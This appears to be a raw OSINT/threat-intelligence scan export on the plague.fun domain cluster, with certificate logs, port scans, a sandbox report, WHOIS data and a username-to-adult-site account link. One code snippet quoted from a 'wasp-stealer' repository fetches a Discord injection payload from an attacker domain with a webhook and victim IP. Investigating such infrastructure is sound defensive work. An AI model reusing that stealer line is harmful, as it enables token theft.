jucTA1+RO3J0SeokML5goUniRJw+Uwfr+ED26aYqyeMWtJLrSnrJVbUW0c1RJSb/HGQRS1OGT/Ji3l3x/JlVCg+/8S9gy5/vMqzwU78dv40X/U8qSmeEc0iMpIUpT0CQ+/8vfD+/GmZS/bmRvNtn9ucgNYGuWm8OVYD0WbBa4y3pYDK/jUGDKK6Fyq/6z/27Nr41LkMSbRcvAhqz9R63dqxadgJ0shE7HvWEvfNzptezdaOsuakuFTzXeF3852qXn8w8DqFp8F4cZ4ISEAj00cIOKkg1Bz9LNTkVo8EzBtEbqE1FSIyLdujanMpJ2t2jeerj7vg==', u'sha256': u'3e85be100bffaa41aba2e11a1f798d83d44538d9ccd62a4edf68e383abdb3c4e', u'type': u'cert'}, u'dns_names': [u'api.plague.fun'], u'tbs_sha256': u'c68f89fe15d40f6e1cfc21d38eedd5936a57e9846f1840a1f7adc96484fd86c8', u'not_before': u'2022-10-23T15:38:18Z', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'9e725d321f7afc5c13793aed856285bb5b34c5a83ecc628871afaf31ed38b6bc', u'revoked': False, u'not_after': u'2023-01-28T18:19:30Z', u'id': u'4359905513', u'cert': {u'data': u'MIIDvzCCA0WgAwIBAgISBGvFWhyq3hElOoWsJ0ashMKpMAoGCCqGSM49BAMDMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJFMTAeFw0yMjEwMzAxODE5MzFaFw0yMzAxMjgxODE5MzBaMBcxFTATBgNVBAMMDCoucGxhZ3VlLmZ1bjBZMBMGByqGSM49AgEGCCqGSM49AwEHA0IABAEBbjB3S0p2vpeUPtevu4n+n8ny6O3UE2p0u1R5uCdtkAHgvl356GE+044TC8DjuemBO9bRgFBqDoDi57zV7FujggJUMIICUDAOBgNVHQ8BAf8EBAMCB4AwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFOks2DhNp65+0tsMaYmxBrJwu6AOMB8GA1UdIwQYMBaAFFrz7Sv8NsI3eblSMOpUb89Vyy6sMFUGCCsGAQUFBwEBBEkwRzAhBggrBgEFBQcwAYYVaHR0cDovL2UxLm8ubGVuY3Iub3JnMCIGCCsGAQUFBzAChhZodHRwOi8vZTEuaS5sZW5jci5vcmcvMCMGA1UdEQQcMBqCDCoucGxhZ3VlLmZ1boIKcGxhZ3VlLmZ1bjBMBgNVHSAERTBDMAgGBmeBDAECATA3BgsrBgEEAYLfEwEBATAoMCYGCCsGAQUFBwIBFhpodHRwOi8vY3BzLmxldHNlbmNyeXB0Lm9yZzCCAQUGCisGAQQB1nkCBAIEgfYEgfMA8QB3AK33vvp8/xDIi509nB4+GGq0Zyldz7EMJMqFhjTr3IKKAAABhCpVuOkAAAQDAEgwRgIhAMJuUTZZDc5OPpNot1LsDaNkK/3DxIwpVkhvldibzER+AiEAorJ1vhPs3Xbqlh8qbG4OKYKAFz5HnI6S5WWTxPJAmnEAdgB6MoxU2LcttiDqOOBSHumEFnAyE4VNO9IrwTpXo1LrUgAAAYQqVbphAAAEAwBHMEUCIFgJ4nVECWUjsuiY5lopVGGClUYAzEzw+XXCP6Ugvlz9AiEAvDcNUHv8YqBTy+O8kx169ydh7v2mIuK3XJySXbSWJ0MwCgYIKoZIzj0EAwMDaAAwZQIwBCGZwWIYvZklmPMMys7I+i8qMbnqspkQ5lf1oyM+SnpsG30cRPwD4Bu5EmMqF+ArAjEAgvfOrPVVk4rsqI4WJVzZXejXxshVYhGViGo0EJ6eYHyjCskvJLQ7fGSyTNoo/bdE', u'sha256': u'c8334a1e1d54310e254140e075b554abf7eb6eee3a8330536bfb363810204efa', u'type': u'cert'}, u'dns_names': [u'*.plague.fun', u'plague.fun'], u'tbs_sha256': u'8f1429103c47de6d147ec80069f42bf0414cf5b0a220f075e16f3573d47cb42d', u'not_before': u'2022-10-30T18:19:31Z', u'issuer': {u'pubkey_sha256': u'276fe8a8c4ec7611565bf9fce6dcace9be320c1b5bea27596b2204071ed04f10', u'name': u"C=US, O=Let's Encrypt, CN=E1"}}, {u'pubkey_sha256': u'0ea98ff70d97728c7d75c56641910e1b9453f50c52bce53928d3c5ca76c630da', u'revoked': False, u'not_after': u'2023-01-28T20:43:45Z', u'id': u'4360219490', u'cert': {u'data': u'MIIEdTCCA12gAwIBAgIQSCBA6RFsRvwTyMaRlabRmzANBgkqhkiG9w0BAQsFADBGMQswCQYDVQQGEwJVUzEiMCAGA1UEChMZR29vZ2xlIFRydXN0IFNlcnZpY2VzIExMQzETMBEGA1UEAxMKR1RTIENBIDFQNTAeFw0yMjEwMzAyMDQzNDZaFw0yMzAxMjgyMDQzNDVaMBcxFTATBgNVBAMMDCoucGxhZ3VlLmZ1bjCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALrhcrXJXlXdiAvXNFeY4NW4DihhJe76rMJzh8Wd/u8I+QCo+Cam8RubtY/Z/GPtmpCTnVJNcQEYghdbYaJ1IZuynv5bvpxdGHWXVQho9WdohgbpW7VCS0j27gULmWLIqHTgTnBLdIOuVbMBoH+Ocu5b+XSXRYj2dpenwuIhdAJdjkFgIXNLXcDBo8RYJDSP4zTdz8nw4qBHh9cpNERA0T9Vg+rdZ1l6MFABw7bzssoFHbPrrmG39BOUkKC2VNYgFuUB6IO0KubwxcuKKT2JfEl6oJBj948z+c60ft/YFouDRcAOFQEDHv2aelXXZKc5uoUswoEPTFKSIYHtAvjcgm8CAwEAAaOCAYwwggGIMA4GA1UdDwEB/wQEAwIFoDATBgNVHSUEDDAKBggrBgEFBQcDATAMBgNVHRMBAf8EAjAAMB0GA1UdDgQWBBSNjMz0ghHh/jiMeolM+1HGJjOSVjAfBgNVHSMEGDAWgBTV/J4N3x7K3QiXl24rxV/FK/XsuDB4BggrBgEFBQcBAQRsMGowNQYIKwYBBQUHMAGGKWh0dHA6Ly9vY3NwLnBraS5nb29nL3MvZ3RzMXA1L041UEtrdlNERXNFMDEGCCsGAQUFBzAChiVodHRwOi8vcGtpLmdvb2cvcmVwby9jZXJ0cy9ndHMxcDUuZGVyMCMGA1UdEQQcMBqCDCoucGxhZ3VlLmZ1boIKcGxhZ3VlLmZ1bjAhBgNVHSAEGjAYMAgGBmeBDAECATAMBgorBgEEAdZ5AgUDMDwGA1UdHwQ1MDMwMaAvoC2GK2h0dHA6Ly9jcmxzLnBraS5nb29nL2d0czFwNS9seUhOTEhvMWVsay5jcmwwEwYKKwYBBAHWeQIEAwEB/wQCBQAwDQYJKoZIhvcNAQELBQADggEBAEqADiYv0s220Q0ZxLs3vEYVG/W9kefFm1ylJjVi6Ewlj2ArLERhIPpaxU/9oeoq3iQPkGHNkbx8r/3n+R5qlCXyxtibqBhzzP4ScQYpDPLHMQP/9zI2puAIxfM7FUuOrh23yqY5NboTEKDpNOBv1SNgHYtAq7XwSXqnFbZxhJSycwOrvfP6ByAFV+GYcKzie1EBxUPzawB6Pdf+E5mRvjuR152hoDkN4d8j0XRnCbc7QuahZHJOqNJjjYU5AszGv7MLNu1zXmKtu5xo9EcbJH0NFW0YrKqy3eeuLpsUbI8YIHN2oga48MH92yM3AdtxAp/WKiX8A88gEImEmves2+E=', u'sha256': u'e90fee33471e445f420dc6f027f4c54e500b881c2f610a9e165722ea988fac0e', u'type': u'precert'}, u'dns_names': [u'*.plague.fun', u'plague.fun'], u'tbs_sha256': u'837ecb87912fdd04bdfaa11a3792a9b8c2864a8c4fde87f5e44e6d4ee993b490', u'not_before': u'2022-10-30T20:43:46Z', u'issuer': {u'pubkey_sha256': u'f3559fd766dc2e51474007c996ec67cd9e85ae0fa827d3d663f5abc2eafcbe24', u'name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5'}}, {u'pubkey_sha256': u'e7ddd456c999332466d993852c18852a3e330cfeb040adcdfdea0f94687eee82', u'revoked': False, u'not_after': u'2023-02-02T13:11:40Z', u'id': u'4379481732', u'cert': {u'data': u'MIIEWjCCA0KgAwIBAgISA/hAB6kqKfqV4l/q8ul1eVeOMA0GCSqGSIb3DQEBCwUAMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJSMzAeFw0yMjExMDQxMzExNDFaFw0yMzAyMDIxMzExNDBaMBsxGTAXBgNVBAMTEGF0bGFzLnBsYWd1ZS5mdW4wWTATBgcqhkjOPQIBBggqhkjOPQMBBwNCAATgMjdFfU0C+aoQ+tjoDynGCvkOgXaF9bmwpDYjBwAImWukfiGUjGB7CpXTio7g9c4Xb0KGCgtao+pBkmIPNilio4ICSjCCAkYwDgYDVR0PAQH/BAQDAgeAMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcDAjAMBgNVHRMBAf8EAjAAMB0GA1UdDgQWBBRQ23IOfyBN6eWHNMa20sjO4VsgjzAfBgNVHSMEGDAWgBQULrMXt1hWy65QCUDmH6+dixTCxjBVBggrBgEFBQcBAQRJMEcwIQYIKwYBBQUHMAGGFWh0dHA6Ly9yMy5vLmxlbmNyLm9yZzAiBggrBgEFBQcwAoYWaHR0cDovL3IzLmkubGVuY3Iub3JnLzAbBgNVHREEFDASghBhdGxhcy5wbGFndWUuZnVuMEwGA1UdIARFMEMwCAYGZ4EMAQIBMDcGCysGAQQBgt8TAQEBMCgwJgYIKwYBBQUHAgEWGmh0dHA6Ly9jcHMubGV0c2VuY3J5cHQub3JnMIIBAwYKKwYBBAHWeQIEAgSB9ASB8QDvAHUAejKMVNi3LbYg6jjgUh7phBZwMhOFTTvSK8E6V6NS61IAAAGEQvuuCAAABAMARjBEAiBhKSKsT3wwhtvLpWIadObwFwSQK9kEpdLaoorzqHxseQIgb0w40ZSYytDVEqq05B6itXCnp8T9ClK+fZoFZ4HQFgMAdgC3Pvsk35xNunXyOcW6WPRsXfxCz3qfNcSeHQmBJe20mQAAAYRC+6/lAAAEAwBHMEUCIQC8jIXrv8Tw2IfkfppmlhVpd17y8W8+OErFdj4s3Brr0gIgYXiAu0BThwEXK1coKxKY0eLZkg2uLC1+gKH58yiU9Q0wDQYJKoZIhvcNAQELBQADggEBAIHJo8iQNZMqjBsfb+CRFolO2BazE3ag6nCTxHISpj33bAnZx5z8QNsRZvMXn5LhlDXAvrpuCb7dR+HWWMkO3pQgBPFUzgL7cFAxCaIek3ylBCilgVvIdaA6v7g7gaVvWqyZLQJIrC2hOvEGzVdM7eXpqBwlus5MzdtWIyFtzNwdQvEJ3Ciolq6822gRW89jkv2TNTPpUTB42Br9VCwHBAQZ+LJ1vO/xSFZBj2Sa8Ccd6zstaY0NDkVWMI5ul5NT1eFrtxz/AFjVB14i1s5PAtgstZ8uTFDUkJ0XmblUtuL4SZbo5Jw/sIcfISppqa2hla9oRZLIu5kX1PyQywXT2ms=', u'sha256': u'1e9cb916ccc4fd493f7420d2e58d07274fd1c30f24785e0b9764ffd07e7fc73f', u'type': u'cert'}, u'dns_names': [u'atlas.plague.fun'], u'tbs_sha256': u'0ec99f53bec04ae700149f53210a6fe7beefeec2222cbaf07f35cc974d41ae16', u'not_before': u'2022-11-04T13:11:41Z', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afad 2022-12-18 00:12:16 Physical Location No ipapi.co 0 0 2 0 None Newark, New Jersey, NJ, United States, US 2606:4700:3032::ac43:be81 2022-12-18 00:22:07 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.0 400 Bad Request 34.149.204.188 2022-12-18 00:10:03 Linked URL - Internal No URLScan.io 1 0 1 0 None https://obf.plague.fun/obf/ plague.fun 2022-12-18 00:04:41 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [u'188.114.96.0'], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://188.114.96.0/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"performance.radar.cloudflare.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"188.114.96.0:80"\n "104.18.30.78:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_eec_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_eec_IESQMMUTEX_0_519"\n "IsoScope_eec_IESQMMUTEX_0_303"\n "UpdatingNewTabPageData"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_eec_ConnHashTable<3820>_HashTable_Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3820"\n "IsoScope_eec_IESQMMUTEX_0_331"\n "IsoScope_eec_IE_EarlyTabStart_0xef0_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_eec_ConnHashTable<3820>_HashTable_Mutex"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27]- [targetUID: 00000000-00003756]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00003820]\n "search_2_.json" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00003820]\n "~DF34B866E6843612E2.TMP" has type "data"- Location: [%TEMP%\\~DF34B866E6843612E2.TMP]- [targetUID: 00000000-00003820]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00003756]\n "0GRXRUKJ.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\0GRXRUKJ.txt]- [targetUID: 00000000-00003820]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00003756]\n "A7H64X8D.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\A7H64X8D.txt]- [targetUID: 00000000-00003756]\n "_2CC87C07-3516-11ED-BF08-08002725C4AA_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "main_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "QGL6N0FI.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\QGL6N0FI.txt]- [targetUID: 00000000-00003820]\n "dberr.txt" has type "ASCII text with CRLF line terminators"- Location: [%WINDIR%\\System32\\catroot2\\dberr.txt]- [targetUID: 00000000-00003756]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63]- [targetUID: 00000000-00003820]'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://188.114.96.0/"\n Pattern match: "http://188.114.96.0"\n Heuristic match: "performance.radar.cloudflare.com"'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-102', u'name': u'Found decrypted SSL traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /beacon.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: http://188.114.96.0/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: performance.radar.cloudflare.com\nDNT: 1\nConnection: Keep-Alive"- [Source: SSL_104.18.30.78]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-21', u'name': u'Malicious artifacts seen in the context of a contacted host', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'Found malicious artifacts related to "188.114.96.0": ...\n\n URL: http://188.114.96.0/ (AV positives: 6/88 scanned on 09/13/2022 13:05:36)\n URL: https://188.114.96.0/20 (AV positives: 5/88 scanned on 08/29/2022 07:42:04)\n URL: https://188.114.96.0/alternatiff/version-ax-w32.txt (AV positives: 5/88 scanned on 08/26/2022 14:30:02)\n URL: http://188.114.96.0/32 (AV positives: 5/88 scanned on 08/11/2022 04:55:54)\n URL: http://rhtradeuk.com/wp-content/plugins/coming-soon/public/fontawesome/css (AV positives: 1/88 scanned on 08/06/2022 05:33:08)\n File SHA256: 2f58ac50edbc16d8aa708d2f6b928076c3411a2fdeefa3031013148ec59ad6fe (AV positives: 5/74 scanned on 04/26/2022 14:32:35)\n File SHA256: f0bd227b5187b7171a5793bb556b41f34f8e8a37afd639aaafa33cd05dc2d66c (AV positives: 38/73 scanned on 04/21/2022 00:58:38)\n File SHA256: 03e01fa5ac22ff7a81a37166ad00b36af9419d3b9e529398d18db7d56b4087e9 (AV positives: 42/74 scanned on 04/06/2022 05:07:18)\n File SHA256: f8cd57c70b1f841df99dd7119c3b97e6d60f54a48be705d146d20ec72668980d (AV positives: 2/74 scanned on 03/26/2022 03:14:18)\n File SHA256: d022191111699963c5aa976d20f57ec096ca14d45041e254da58ac47b238a643 (AV positives: 2/72 scanned on 03/19/2022 21:57:19)\n File SHA256: 04a2e72e1b815b556294690f35a7f2cf5f5b1d2830fafc8dad0656b2150c4bab (Date: 02/15/2022 21:36:23)'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-22', u'name': u'Uses a User Agent typical for browsers, although no browser was ever launched', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'Found user agent(s): Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 1, u'type': 2, u'description': u'Potential IP "188.114.96.0" found in string "http://188.114.96.0/"\n Potential IP "188.114.96.0" found in string "http://188.114.96.0"\n "188.114.96.0"\n Potential IP "188.114.96.0" found in string "GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: 188.114.96.0\nDNT: 1\nConnection: Keep-Alive"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-0', u'name': u'Sample was identified as malicious by at least one Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', 188.114.96.0 2022-12-18 00:02:39 Domain Name No SpiderFoot UI 24 0 0 0 None misogyny.wtf plague.fun,misogyny.wtf,rasputain.fr,zerotwo-best-waifu.online,137.117.157.128,20.195.209.219,4.228.83.86,40.113.112.131,51.103.210.236,20.224.2.213 2022-12-18 00:04:28 Affiliate - Internet Name No DNS Raw Records 1 0 1 0 None journey.ns.cloudflare.com rasputain.fr 2022-12-18 00:09:24 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.7:80 188.114.96.0/24 2022-12-18 00:21:09 Open TCP Port No Censys 0 0 2 0 None 188.114.96.0:8443 188.114.96.0 2022-12-18 00:12:46 Physical Location No ipapi.co 0 0 2 0 None Newark, New Jersey, NJ, United States, US 2606:4700:3035::6815:1bf2 2022-12-18 00:05:16 Account on External Site No Account Finder 0 0 2 0 None Pornhub Users (Category: XXXPORNXXX) https://www.pornhub.com/users/rasputain rasputain 2022-12-18 00:02:47 Raw Data from RIRs No grep.app 0 0 1 0 None {u'repo': {u'raw': u'aceeontop/wasp-stealer'}, u'total_matches': {u'raw': u'1'}, u'content': {u'snippet': u'
472
 os.makedirs(end_path+"\\\\W4SPStealer")
473
 paylaod = urlopen("http://zerotwo-best-waifu.online/778112985743251/wap/dsc_injection").read().decode("utf8").replace("%WEBHOOK%",hook).replace("%IP%",f"{getip()}")
'}, u'branch': {u'raw': u'main'}, u'path': {u'raw': u'OldWaspsVersions/wasp-1.1.2.py'}, u'id': {u'raw': u'g/aceeontop/wasp-stealer/main/OldWaspsVersions/wasp-1.1.2.py'}, u'owner_id': {u'raw': u'89152258'}} zerotwo-best-waifu.online 2022-12-18 00:18:29 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.12:443 188.114.97.0/24 2022-12-18 00:02:43 SSL Certificate - Issued by No CertSpotter 0 0 1 0 None C=US,O=Let's Encrypt,CN=E1 plague.fun 2022-12-18 00:09:19 Open TCP Port No LeakIX 0 0 2 0 None 172.67.137.37:80 172.67.137.37 2022-12-18 00:26:49 Similar Domain - Whois No Whois 2 0 2 0 None Domain Name: plague.org Registry Domain ID: 8bd26273e60b490495d081f7f0b8a64c-LROR Registrar WHOIS Server: whois.tucows.com Registrar URL: http://www.tucows.com Updated Date: 2022-10-17T05:18:28Z Creation Date: 1998-12-17T05:00:00Z Registry Expiry Date: 2023-12-17T05:00:00Z Registrar: Tucows Domains Inc. Registrar IANA ID: 69 Registrar Abuse Contact Email: domainabuse@tucows.com Registrar Abuse Contact Phone: +1.4165350123 Domain Status: ok https://icann.org/epp#ok Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Contact Privacy Inc. Customer 014119788 Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: ON Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: CA Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: dns1.stabletransit.com Name Server: dns2.stabletransit.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:26:49Z <<< For more information on Whois status codes, please visit https://icann.org/epp Terms of Use: Access to Public Interest Registry WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the Public Interest Registry registry database. The data in this record is provided by Public Interest Registry for informational purposes only, and Public Interest Registry does not guarantee its accuracy. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Identity Digital except as reasonably necessary to register domain names or modify existing registrations. All rights reserved. Public Interest Registry reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. The Registrar of Record identified in this output may have an RDDS service that can be queried for additional information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Domain Name: PLAGUE.ORG Registry Domain ID: D3094865-LROR Registrar WHOIS Server: whois.tucows.com Registrar URL: http://tucowsdomains.com Updated Date: 2022-10-12T05:18:07 Creation Date: 1998-12-17T05:00:00 Registrar Registration Expiration Date: 2023-12-17T05:00:00 Registrar: TUCOWS, INC. Registrar IANA ID: 69 Domain Status: ok https://icann.org/epp#ok Registry Registrant ID: Registrant Name: Contact Privacy Inc. Customer 014119788 Registrant Organization: Contact Privacy Inc. Customer 014119788 Registrant Street: 96 Mowat Ave Registrant City: Toronto Registrant State/Province: ON Registrant Postal Code: M6K 3M1 Registrant Country: CA Registrant Phone: +1.4165385457 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: plague.org@contactprivacy.com Registry Admin ID: Admin Name: Contact Privacy Inc. Customer 014119788 Admin Organization: Contact Privacy Inc. Customer 014119788 Admin Street: 96 Mowat Ave Admin City: Toronto Admin State/Province: ON Admin Postal Code: M6K 3M1 Admin Country: CA Admin Phone: +1.4165385457 Admin Phone Ext: Admin Fax: Admin Fax Ext: Admin Email: plague.org@contactprivacy.com Registry Tech ID: Tech Name: Contact Privacy Inc. Customer 014119788 Tech Organization: Contact Privacy Inc. Customer 014119788 Tech Street: 96 Mowat Ave Tech City: Toronto Tech State/Province: ON Tech Postal Code: M6K 3M1 Tech Country: CA Tech Phone: +1.4165385457 Tech Phone Ext: Tech Fax: Tech Fax Ext: Tech Email: plague.org@contactprivacy.com 